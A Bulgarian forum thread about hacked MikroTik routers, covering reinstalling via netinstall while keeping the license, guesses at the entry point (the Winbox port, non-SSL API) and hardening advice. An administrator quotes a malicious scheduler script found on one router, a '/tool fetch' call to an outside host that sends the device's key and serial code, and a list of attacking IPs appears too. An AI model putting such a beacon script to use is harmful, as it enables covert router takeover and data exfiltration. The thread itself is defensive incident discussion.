Jump to content
  • 0

Хакнат микротик


px1

Question

Здравейте, Хакнаха ми един mikrotik L4 на X86 платформа.

Беше ограничен за достъп само от 5 IP адреса и със спрени всички сървиси осен API и WINBOX

Има ли начин да се преинсталира флашката за да се запази лиценза ?

 

Link to comment
Share on other sites

Recommended Posts

  • 0
  • Administrator

С нетинстал би трябвало да се запази ключа
ако не е най наложителната машина пиши на support@mikrotik.com 
дано намерят какво по дяволите правят гадовете

 

п.с

И на последната го лекуват гадовете вече влизам само през ROMON
в Scheduler се появява някаква задача "а" която изпълнява скрипт с име "ip"
със следното съдържание:
 

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bcжжжжжжжжжbf27&action=upload&sncode=A5C1F569жжжжжжжжжA8ED4743AEC042B&dynamic=static")  keep-result=no}

админ акаунт и да няма се създава

включват се всички сървиси и им се махат ограниченията

https://forum.mikrotik.com/viewtopic.php?t=135762

Харесай поста ^^^
acer.gif htc.gifsigpic4024_2.gif

Форумът е за взаимопомощ а не за свършване на чужда работа


ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ

Link to comment
Share on other sites

  • 0

Как става достъпа при положение, че е ограничен само от 5 адреса?

Analog Audio™

Link to comment
Share on other sites

  • 0

Версията беше 6.42.5

Първоначално забелязах че че се появява PPTP сървис с име test и се появяваше маскарад на целя трафик и нов pool на DHCP и нови часни адреси.

Акаунта и паролите не бяха променени.

Веднага смених всички пароли и спрях сървисите освен API (заради Билинга) и WINBOX само от 5 IP адреса.

От петък сутринта вече нямам  достъп с акаунта си , но интернета на два от рутърите си върви , а на трети е спрял.

Третия е с бридж на два от портовете защото го ползвам и за суич.

Предполагам че хака се прави по някаква странна схема която чупи моята конфигурация на този рутър.

Утре ще купя нов CCR  и GR3 за да може после  netinstall да изтрия старите рутъри.

Предполагам чупят линукса и си оставят врата .

Edited by px1
Link to comment
Share on other sites

  • 0
  • Administrator
Преди 3 часа, master написа:

Как става достъпа при положение, че е ограничен само от 5 адреса?

Мисля проблема е в ползването на non-ssl API , а и по-добре след такъв пробив да се ползва последен бекъп, като му се сменят всички пароли и  се затвърди стената, чрез смяна на портове, динамични блек листи за брутфорс и сканери, уайт листи за достъп и т.н. преди да се подвърже към публичното пространство!

Link to comment
Share on other sites

  • 0

От години не се беше случвало да видя в лога IP адреси който са се опитвали да се конектнат. На един от микротиците за 24 часа са се опитвали тези :

195.43.95.9о
185.2о9.0.12
5.188.4о.99
5.188.4о.100
138.68.51.1о7
77.72.83.11едно

 

Analog Audio™

Link to comment
Share on other sites

  • 0
  • Administrator

Достъп  от 5 адреса за всичко или само за изброените услуги ?

А  от кой адрес са се логнали първия път ?

Use since

OpenBSD 3.x

FreeBSD 4.x

Centos 5.x Debian 3.x Ubuntu 7.x

Аз съм фен на OpenWRT.

 

Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена.

_____________________________

___|____|____|____|____|____|__

_|____|____|____|____|____|____

___|____|_ Удряй _|____|____|__

_|____|___ главата ___|____|____

___|____|_ си тук!! |____|____|__

_|____|____|____|____|____|____

___|____|____|____|____|____|__

Link to comment
Share on other sites

  • 0
  • Administrator
Преди 10 часа, kokaracha написа:

Достъп  от 5 адреса за всичко или само за изброените услуги ?

А  от кой адрес са се логнали първия път ?

Няма лог за първия път защото по някакъв начин теглят базата с поребителите

Харесай поста ^^^
acer.gif htc.gifsigpic4024_2.gif

Форумът е за взаимопомощ а не за свършване на чужда работа


ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ

Link to comment
Share on other sites

  • 0

Исто и кај мене хакнат един от два МТ ccr. Само winbox port е дозволен.

Edited by Fibernet
Link to comment
Share on other sites

  • 0
  • Administrator
Преди 11 часа, 111111 написа:

Няма лог за първия път защото по някакъв начин теглят базата с поребителите

 

Няма много начини за това. Или са имали данните и достъп или ограничението по адреси не работи или не е конфигнато правилно ( локанли мрежи ?).

Use since

OpenBSD 3.x

FreeBSD 4.x

Centos 5.x Debian 3.x Ubuntu 7.x

Аз съм фен на OpenWRT.

 

Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена.

_____________________________

___|____|____|____|____|____|__

_|____|____|____|____|____|____

___|____|_ Удряй _|____|____|__

_|____|___ главата ___|____|____

___|____|_ си тук!! |____|____|__

_|____|____|____|____|____|____

___|____|____|____|____|____|__

Link to comment
Share on other sites

  • 0
  • Administrator
Преди 9 часа, Fibernet написа:

Исто и кај мене хакнат един от два МТ ccr. Само winbox port е дозволен.

Точно през този порт става атаката.

Харесай поста ^^^
acer.gif htc.gifsigpic4024_2.gif

Форумът е за взаимопомощ а не за свършване на чужда работа


ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ

Link to comment
Share on other sites

  • 0

Явно Микротик го закъсаха относно сигурност. По неофициална информация знам че изпращането на файлове с вградения модул за изпращане на мейли също е бил компроментиран. Явно е въпрос на време да изпищят още хора. 

Link to comment
Share on other sites

  • 0

Здравейте,

преинсталирах си флашката без да губя лиценза използвайки описанието на MIKOROTIK

https://forum.mikrotik.com/viewtopic.php?t=86528

По въпроса с пробива прилагам преинсталация с netinstall , смяна на портовете и паролите и филтрация на портовете още във входящия рутър.

Ще изчакам няколко дни да видя има ли ефект.

 

Link to comment
Share on other sites

  • 0
  • Administrator

Изглеждат глупаво  тези мерки щом  има проблем със сигурноста на самата система. По добре някакъв тунел с адмиснистративна */29 мрежа примерно би било доста по сигурно.

Use since

OpenBSD 3.x

FreeBSD 4.x

Centos 5.x Debian 3.x Ubuntu 7.x

Аз съм фен на OpenWRT.

 

Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена.

_____________________________

___|____|____|____|____|____|__

_|____|____|____|____|____|____

___|____|_ Удряй _|____|____|__

_|____|___ главата ___|____|____

___|____|_ си тук!! |____|____|__

_|____|____|____|____|____|____

___|____|____|____|____|____|__

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.